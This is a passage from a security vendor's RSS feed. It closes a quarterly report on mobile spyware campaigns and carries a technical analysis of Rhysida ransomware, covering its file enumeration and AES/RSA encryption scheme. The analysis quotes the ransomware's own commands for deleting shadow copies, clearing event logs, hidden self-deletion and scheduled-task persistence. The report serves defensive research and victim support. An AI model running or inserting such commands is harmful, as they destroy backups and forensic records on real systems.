<p>Another version of <a href="https://www.mcafee.com/blogs/other-blogs/mcafee-labs/android-spynote-attacks-electric-and-water-public-utility-users-in-japan/" target="_blank" rel="noreferrer noopener">SpyNote/Spymax</a> was used as part of a short campaign targeting users in Japan with fake SMS messages about unpaid utility or water bills. Containing a sense of urgency, these messages led victims to a series of phishing sites which downloaded the SpyNote onto their devices. Once installed, the malware would direct users to open settings and enable the accessibility service to allow it install further malware and hide itself on the device. It then spied on victim’s personal data and was able to access authenticator apps on the device and steal social media credentials.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="513" height="1024" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1.-SpyNote-config-513x1024.png" alt="" class="wp-image-7799" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1.-SpyNote-config-513x1024.png 513w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1.-SpyNote-config-150x300.png 150w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1.-SpyNote-config.png 548w" sizes="(max-width: 513px) 100vw, 513px" /><figcaption class="wp-element-caption"><em>The SpyNote config containing various settings and checks, such as having Accessibility enabled</em> </figcaption></figure></div>
<p>In relation to recent escalating situation between Israel and Palestine, it is worth highlighting a <a href="https://blog.cloudflare.com/malicious-redalert-rocket-alerts-application-targets-israeli-phone-calls-sms-and-user-information/" target="_blank" rel="noreferrer noopener">spyware Red Alert</a> missile warning app that was distributed through a phishing website. The original app is used by many in Israel to monitor missile warnings. The fake Red Alert spyware app contained identical features with added abilities that allow it to spy on its victims. This included extracting the call log, SMS lists, location, and emails, among others. The malware also features anti-debugging and anti-emulation that attempts to prevent detection. While not documented, it is possible this malware could also be used to deliver fake warning messages, as has happened with <a href="https://cybernews.com/cyber-war/israel-redalert-breached-anonghost-hamas/" target="_blank" rel="noreferrer noopener">other breached missile warning apps.</a></p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1021" height="1024" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2.-RedAlert-fake-website-1021x1024.jpg" alt="" class="wp-image-7801" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2.-RedAlert-fake-website-1021x1024.jpg 1021w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2.-RedAlert-fake-website-300x300.jpg 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2.-RedAlert-fake-website-150x150.jpg 150w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2.-RedAlert-fake-website-768x770.jpg 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2.-RedAlert-fake-website-214x214.jpg 214w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2.-RedAlert-fake-website-344x344.jpg 344w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2.-RedAlert-fake-website-442x442.jpg 442w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2.-RedAlert-fake-website.jpg 1262w" sizes="(max-width: 1021px) 100vw, 1021px" /><figcaption class="wp-element-caption"><em>Phishing site impersonating the original RedAlert missile warning website that downloads the spyware payload</em></figcaption></figure></div>
<p>As noted in the past quarterly reports, mods for WhatsApp, Telegram and Signal are becoming a more popular target for threat actors. We observe another case of <a href="https://securelist.com/trojanized-telegram-mod-attacking-chinese-users/110482/" target="_blank" rel="noreferrer noopener">Trojanized Telegram mods</a> discovered on the PlayStore, this time targeting Chinese speaking victims. This version appears like the Telegram app at face value, but harvests user information, messages, calls and contact lists in the background. These are then exfiltrated to a cloud service to be further used by malicious actors. Similarly, <a href="https://www.welivesecurity.com/en/eset-research/badbazaar-espionage-tool-targets-android-users-trojanized-signal-telegram-apps/" target="_blank" rel="noreferrer noopener">BadBazaar</a> samples have been spread through trojanized Signal and Telegram apps. Using fake websites to lure victims in, this strain appears to be targeting the Uyghur population. It contains a similar spyware feature set as the trojanized telegram mods. These malicious modifications are around to stay, and users are advised to avoid modifications for popular messaging apps.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="694" height="1024" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/3.-FlyGram-splash-screen-694x1024.jpg" alt="" class="wp-image-7802" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/3.-FlyGram-splash-screen-694x1024.jpg 694w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/3.-FlyGram-splash-screen-203x300.jpg 203w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/3.-FlyGram-splash-screen.jpg 767w" sizes="(max-width: 694px) 100vw, 694px" /><figcaption class="wp-element-caption"><em>Splash screen of the fake FlyGram mod that contains BadBazaar spyware</em></figcaption></figure></div>
<p>Spyloan applications continue to spread on the PlayStore. As <a href="https://www.zimperium.com/blog/moneymonger-predatory-loan-scam-campaigns-move-to-flutter/" target="_blank" rel="noreferrer noopener">reported on by Zimperium</a>, these apps remain mostly unchanged and offer loans to unsuspecting victims in various Asian and South American countries. Once the user installs the application, it requests various invasive permissions under the guise of a credit check. If the victim allows these, the actors behind the spy loans will harvest victim data such as messages, contact lists and photos to name a few. These are then used to extort victims into often paying more than the agreed amount and this harassment may continue even after the debt is paid. Users are advised to avoid unofficial sources of loans to avoid this type of extortion.  </p>
<p>This quarter brings a slight decrease in the prevalence of spyware in the mobile sector. While several strains of malicious mods snuck onto the PlayStore, we see an overall decrease in activity and spread of spyware this quarter.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/4.-Spyware-daily-hits-1024x404.png" alt="" class="wp-image-7803" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/4.-Spyware-daily-hits-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/4.-Spyware-daily-hits-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/4.-Spyware-daily-hits-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/4.-Spyware-daily-hits-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/4.-Spyware-daily-hits-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Global risk ratio of mobile spyware in Q2/2023 and Q3/2023</em></figcaption></figure></div>
<p>Brazil continues to have the highest number of protected users this quarter, followed by Turkey, US, and India. Yemen has the highest risk of encountering mobile malware in comparison to the rest of the world.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="639" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/5.-Spyware-risk-map-1024x639.png" alt="" class="wp-image-7804" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/5.-Spyware-risk-map-1024x639.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/5.-Spyware-risk-map-300x187.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/5.-Spyware-risk-map-768x479.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/5.-Spyware-risk-map-1536x958.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/5.-Spyware-risk-map-2048x1278.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Global risk ratio for mobile spyware in Q3/2023</em></figcaption></figure></div>
<p class="has-text-align-right"><em>Jakub Vávra, Malware Analyst</em></p>
<h2 class="wp-block-heading">Acknowledgements / Credits</h2>
<div class="wp-block-columns is-layout-flex wp-container-core-columns-layout-4 wp-block-columns-is-layout-flex">
<div class="wp-block-column is-layout-flow wp-block-column-is-layout-flow">
<h6 class="wp-block-heading">Malware researchers</h6>
<p>Adolf Středa<br>Alexej Savčin<br>Bohumír Fajt<br>Branislav Kramár<br>David Álvarez<br>Igor Morgenstern<br>Jakub Křoustek<br>Jakub Vávra<br>Jan Rubín<br>Jan Vojtěšek<br>Ladislav Zezula<br>Luigino Camastra<br>Luis Corrons<br>Martin Chlumecký<br>Matěj Krčma<br>Michal Salát<br>Ondřej Mokoš </p>
</div>
<div class="wp-block-column is-layout-flow wp-block-column-is-layout-flow">
<h6 class="wp-block-heading">Data analysts</h6>
<p>Pavol Plaskoň<br>Filip Husák<br>Lukáš Zobal </p>
</div>
<div class="wp-block-column is-layout-flow wp-block-column-is-layout-flow">
<h6 class="wp-block-heading">Communications</h6>
<p>Brittany Posey<br>Emma McGowan </p>
</div>
</div>
<p>The post <a href="https://decoded.avast.io/threatresearch/avast-q3-2023-threat-report/">Avast Q3/2023 Threat Report</a> appeared first on <a href="https://decoded.avast.io">Avast Threat Labs</a>.</p>
]]></content:encoded>
<enclosure url="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/Trump.mp4" length="2291110" type="video/mp4" />
<enclosure url="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/Musk.mp4" length="2781524" type="video/mp4" />
</item>
<item>
<title>Rhysida Ransomware Technical Analysis</title>
<link>https://decoded.avast.io/threatresearch/rhysida-ransomware-technical-analysis/?utm_source=rss&utm_medium=rss&utm_campaign=rhysida-ransomware-technical-analysis</link>
<dc:creator><![CDATA[Threat Research Team]]></dc:creator>
<pubDate>Thu, 26 Oct 2023 11:31:10 +0000</pubDate>
<category><![CDATA[PC]]></category>
<category><![CDATA[decryptor]]></category>
<category><![CDATA[decryptors]]></category>
<category><![CDATA[ransomware]]></category>
<guid isPermaLink="false">https://decoded.avast.io/?p=7747</guid>
<description><![CDATA[<p>Technical analysis of Rhysida Ransomware family that emerged in the Q2 of 2023</p>
<p>The post <a href="https://decoded.avast.io/threatresearch/rhysida-ransomware-technical-analysis/">Rhysida Ransomware Technical Analysis</a> appeared first on <a href="https://decoded.avast.io">Avast Threat Labs</a>.</p>
]]></description>
<content:encoded><![CDATA[
<p>Rhysida is a new ransomware strain that emerged in the second quarter of 2023. The first mention of the Rhysida ransomware was <a href="https://twitter.com/malwrhunterteam/status/1658829565215604738" target="_blank" rel="noreferrer noopener">in May 2023</a> by <a href="https://twitter.com/malwrhunterteam" target="_blank" rel="noreferrer noopener">MalwareHunterTeam</a> (sample’s timestamp is May 16, 2023). As of Oct 12, the ransomware’s leak site contains a list of over 50 attacked organizations of all types, including government, healthcare, and IT.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="859" height="1024" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-00-leak-site-859x1024.png" alt="" class="wp-image-7748" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-00-leak-site-859x1024.png 859w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-00-leak-site-252x300.png 252w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-00-leak-site-768x916.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-00-leak-site.png 1015w" sizes="(max-width: 859px) 100vw, 859px" /><figcaption class="wp-element-caption">Screenshot of the Rhysida data leak site as of Oct 16, 2023 </figcaption></figure></div>
<p>Victims of the Rhysida ransomware can contact Avast experts directly at <code>decryptors-at-avast-dot-com</code> for a free consultation about how to mitigate damage caused by the attack. </p>
<h2 class="wp-block-heading">Analysis of the Rhysida encryptor </h2>
<p>The Rhysida encryptor comes as a 32-bit or 64-bit Windows PE file, compiled by MinGW GNU version 6.3.0 and linked by the GNU linker v 2.30. The first public version comes as a debug version, which makes its analysis easier. </p>
<p>For cryptographic operations, Rhysida uses the <a href="https://github.com/libtom/libtomcrypt" target="_blank" rel="noreferrer noopener">LibTomCrypt</a> library version <a href="https://github.com/libtom/libtomcrypt/releases/tag/v1.18.1" target="_blank" rel="noreferrer noopener">1.18.1</a>. For multi-threaded and synchronization operations, Rhysida uses the <a href="https://github.com/ldx/winpthreads" target="_blank" rel="noreferrer noopener">winpthreads</a> library. <a href="https://github.com/libtom/libtomcrypt/blob/develop/src/prngs/chacha20.c" target="_blank" rel="noreferrer noopener">Chacha20 pseudo-random number generator</a> is used for generating random numbers, such as AES encryption key, AES initialization vector and random padding for RSA-OAEP encryption. The public RSA key is hard-coded in the binary (ASN1-encoded) and loaded using the <a href="https://github.com/libtom/libtomcrypt/blob/7e863d21429f94ed6a720e24499a12a3f852bb31/src/pk/rsa/rsa_import.c#L85" target="_blank" rel="noreferrer noopener">rsa_import</a> function. Each sample has different embedded RSA key. </p>
<p>The encryptor executable supports the following command line arguments: </p>
<ul>
<li><code>-d</code> Specifies a directory name to encrypt. If omitted, all drives (identified by letters) are encrypted </li>
<li><code>-sr</code> Enables self-remove after file encryption </li>
<li><code>-nobg</code> Disables setting desktop background </li>
<li><code>-S</code> When present, Rhysida will create a scheduled task, executing at OS startup under the System account </li>
<li><code>-md5</code> When present, Rhysida will calculate MD5 hash of each file before it is encrypted. However, this feature is not fully implemented yet – the MD5 is calculated, but it’s not used anywhere later. </li>
</ul>
<p>When executed, the encryptor queries the number of processors in the system. This value serves for: </p>
<ul>
<li>Allocating random number generators (one per processor) </li>
<li>Creating <code>Encryptor</code> threads (one per processor) </li>
</ul>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="787" height="403" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-01-processor-count.png" alt="" class="wp-image-7749" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-01-processor-count.png 787w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-01-processor-count-300x154.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-01-processor-count-768x393.png 768w" sizes="(max-width: 787px) 100vw, 787px" /><figcaption class="wp-element-caption">Initialization for multi-threaded encryption </figcaption></figure></div>
<p>Furthermore, Rhysida creates a <code>File Enumerator</code> thread, which searches all available disk drives by letter. Binaries prior July 2023 enumerate drives in normal order (from A: to Z:); binaries built after July 1<sup>st</sup> enumerate drives in reverse order (from Z: to A:). </p>
<p>The <code>File Enumerator</code> thread searches for files to encrypt and puts them into a synchronized list, ready to be picked by one of the <code>Encryptor</code> threads. Files in system critical folders, and files necessary to run operating systems and programs, are excluded from encryption. </p>
<p>List of skipped directories: </p>
<div class="wp-block-columns is-layout-flex wp-container-core-columns-layout-5 wp-block-columns-is-layout-flex">
<div class="wp-block-column is-layout-flow wp-block-column-is-layout-flow">
<ul>
<li>/$Recycle.Bin </li>
<li>/Boot </li>
<li>/Documents and Settings </li>
<li>/PerfLogs </li>
<li>/Program Files </li>
<li>/Program Files (x86)</li>
</ul>
</div>
<div class="wp-block-column is-layout-flow wp-block-column-is-layout-flow">
<ul>
<li>/ProgramData </li>
<li>/Recovery </li>
<li>/System Volume Information  </li>
<li>/Windows </li>
<li>/$RECYCLE.BIN</li>
</ul>
</div>
</div>
<p></p>
<p>List of skipped file types:</p>
<div class="wp-block-columns is-layout-flex wp-container-core-columns-layout-6 wp-block-columns-is-layout-flex">
<div class="wp-block-column is-layout-flow wp-block-column-is-layout-flow">
<ul>
<li>.bat </li>
<li>.bin </li>
<li>.cab </li>
<li>.cd </li>
<li>.com </li>
<li>.cur </li>
<li>.dagaba </li>
<li>.diagcfg </li>
<li>.diagpkg </li>
</ul>
</div>
<div class="wp-block-column is-layout-flow wp-block-column-is-layout-flow">
<ul>
<li>.drv </li>
<li>.dll </li>
<li>.exe </li>
<li>.hlp </li>
<li>.hta </li>
<li>.ico </li>
<li>.lnk </li>
<li>.msi </li>
<li>.ocx</li>
</ul>
</div>
<div class="wp-block-column is-layout-flow wp-block-column-is-layout-flow">
<ul>
<li>.ps1 </li>
<li>.psm1 </li>
<li>.scr </li>
<li>.sys </li>
<li>.ini </li>
<li>Thumbs.db </li>
<li>.url </li>
<li>.iso </li>
</ul>
</div>
</div>
<p>Additionally, the ransom note file, usually named <code>CriticalBreachDetected.pdf</code>, is excluded from the list of encrypted files. The PDF content of the ransom note file is hard-coded in the binary and is dropped into each folder. The following picture shows an example of the ransom note from a September version of the ransomware:</p>
<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="776" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-02-ranson-note-1024x776.png" alt="" class="wp-image-7752" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-02-ranson-note-1024x776.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-02-ranson-note-300x227.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-02-ranson-note-768x582.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-02-ranson-note.png 1236w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
<p>In addition to dropping the ransom note, if enabled in the configuration, Rhysida generates a JPEG picture<s>,</s> which is stored into <code>C:/Users/Public/bg.jpg</code>. Earlier version of the ransomware generated the image with unwanted artifacts, which was fixed in later builds of Rhysida. The following picture shows an example of such JPEG pictures: </p>
<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="428" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-03-desktop-background-1024x428.png" alt="" class="wp-image-7753" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-03-desktop-background-1024x428.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-03-desktop-background-300x125.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-03-desktop-background-768x321.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-03-desktop-background.png 1431w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
<p>The picture is set as the desktop background on the infected device. For that purpose, a set of calls to an external process via <code>system</code> (a C equivalent of CreateProcess) is used: </p>
<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="277" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-03-set-desktop-background-1024x277.png" alt="" class="wp-image-7754" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-03-set-desktop-background-1024x277.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-03-set-desktop-background-300x81.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-03-set-desktop-background-768x208.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-03-set-desktop-background.png 1371w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
<p>Rhysida may or may not (depending on the configuration and binary version) execute additional actions, including: <br> </p>
<ul>
<li>Delete shadow copies using: <br> <br><code>cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet</code> <br> </li>
<li>Delete the event logs with this command: <br> <br><code>cmd.exe /c for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"</code><br></li>
</ul>
<ul>
<li>Delete itself via Powershell command <br> <br><code>cmd.exe /c start powershell.exe -WindowStyle Hidden -Command Sleep -Milliseconds 500; Remove-Item -Force -Path "%BINARY_NAME%” -ErrorAction SilentlyContinue;</code> <br> </li>
<li>(Re-)create scheduled task on Windows startup: <br> <br><code>cmd.exe /c start powershell.exe -WindowStyle Hidden -Command “Sleep -Milliseconds 1000; schtasks /end /tn Rhsd; schtasks /delete /tn Rhsd /f; schtasks /create /sc ONSTART /tn Rhsd /tr \”</code> <br> </li>
<li>Remove scheduled task using: <br> <br><code>cmd.exe /c start powershell.exe -WindowStyle Hidden -Command "Sleep -Milliseconds 1000; schtasks /delete /tn Rhsd /f;"</code> </li>
</ul>
<h2 class="wp-block-heading">How Rhysida encrypts files </h2>
<p>To achieve the highest possible encryption speed, Rhysida’s encryption is performed by multiple <code>Encryptor</code> threads. Files bigger than 1 MB (1048576 bytes) are divided to 2-4 blocks and only 1 MB of data is encrypted from each block. The following table shows an overview of the number of blocks, size of one block and length of the encrypted part: </p>
<figure class="wp-block-table"><table><tbody><tr><td class="has-text-align-center" data-align="center">File Size</td><td class="has-text-align-center" data-align="center">Block Count</td><td class="has-text-align-center" data-align="center">Block Size</td><td class="has-text-align-center" data-align="center">Encrypted Length</td></tr><tr><td class="has-text-align-center" data-align="center">0 – 1 MB</td><td class="has-text-align-center" data-align="center">1</td><td class="has-text-align-center" data-align="center">(whole file)</td><td class="has-text-align-center" data-align="center">(whole block)</td></tr><tr><td class="has-text-align-center" data-align="center">1 – 2 MB </td><td class="has-text-align-center" data-align="center">1</td><td class="has-text-align-center" data-align="center">(whole file)</td><td class="has-text-align-center" data-align="center">1048576</td></tr><tr><td class="has-text-align-center" data-align="center">2 – 3 MB</td><td class="has-text-align-center" data-align="center">2</td><td class="has-text-align-center" data-align="center">File Size / 2</td><td class="has-text-align-center" data-align="center">1048576</td></tr><tr><td class="has-text-align-center" data-align="center">3 – 4 MB </td><td class="has-text-align-center" data-align="center">3</td><td class="has-text-align-center" data-align="center">File Size / 3</td><td class="has-text-align-center" data-align="center">1048576</td></tr><tr><td class="has-text-align-center" data-align="center">> 4MB </td><td class="has-text-align-center" data-align="center">4</td><td class="has-text-align-center" data-align="center">File Size / 4</td><td class="has-text-align-center" data-align="center">1048576</td></tr></tbody></table><figcaption class="wp-element-caption">Table 1: File sizes, block counts, block lengths and encrypted lengths. </figcaption></figure>
<p>Multiple steps are performed to encrypt a file: </p>
<ul>
<li>The file is renamed to have the “.rhysida” extension. </li>
<li>The file size is obtained by the sequence below. Note that earlier versions of the ransomware contain a bug, which causes the upper 32 bits of the file size to be ignored. In later versions of Rhysida, this bug is fixed. </li>
</ul>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="670" height="217" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-05-get-file-size.png" alt="" class="wp-image-7755" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-05-get-file-size.png 670w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-05-get-file-size-300x97.png 300w" sizes="(max-width: 670px) 100vw, 670px" /></figure></div>
<ul>
<li>Based on the file size, Rhysida calculates counts and length shown in Table 1. </li>
<li>32-byte file encryption key and 16-byte initialization vector for AES-256 stream cipher is generated using the random number generator associated with the <code>Encryptor</code> thread.  </li>
<li>Files are encrypted using AES-256 in <a href="https://github.com/libtom/libtomcrypt/blob/b96e96cf8b22a931e8e91098ac37bc72f9e2f033/src/modes/ctr/ctr_encrypt.c#L80" target="_blank" rel="noreferrer noopener">CTR mode</a>. </li>
<li>Both file encryption key and the IV are encrypted by <a href="https://github.com/libtom/libtomcrypt/blob/b96e96cf8b22a931e8e91098ac37bc72f9e2f033/src/pk/rsa/rsa_encrypt_key.c#L27" target="_blank" rel="noreferrer noopener">RSA-4096</a> with OAEP padding and stored to the file tail structure. </li>
<li>This file tail is appended to the end of the encrypted file: </li>
</ul>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="216" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-06-file-tail-1024x216.png" alt="" class="wp-image-7756" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-06-file-tail-1024x216.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-06-file-tail-300x63.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-06-file-tail-768x162.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-06-file-tail.png 1056w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure></div>
<h2 class="wp-block-heading">Conclusion </h2>
<p>Rhysida is a relatively new ransomware, but already has a long list of attacked organizations. As of October 2023, it is still in an active development.  </p>
<p>Victims of the Rhysida ransomware may contact us at <code>decryptors-at-avast-dot-com</code> for a consultation about how to mitigate damage caused by the attack. </p>
<p>The post <a href="https://decoded.avast.io/threatresearch/rhysida-ransomware-technical-analysis/">Rhysida Ransomware Technical Analysis</a> appeared first on <a href="https://decoded.avast.io">Avast Threat Labs</a>.</p>
]]></content:encoded>
</item>
</channel>
</rss>

If you would like to create a banner that links to this page (i.e. this validation result), do the following:

Download the "valid RSS" banner.
Upload the image to your own server. (This step is important. Please do not link directly to the image on this server.)
Add this HTML to your page (change the image src attribute if necessary):

<a href="http://www.feedvalidator.org/check.cgi?url=https%3A//decoded.avast.io/feed/"><img src="valid-rss-rogers.png" alt="[Valid RSS]" title="Validate my RSS feed" /></a>

If you would like to create a text link instead, here is the URL you can use:

http://www.feedvalidator.org/check.cgi?url=https%3A//decoded.avast.io/feed/

Home · About · News · Docs · Terms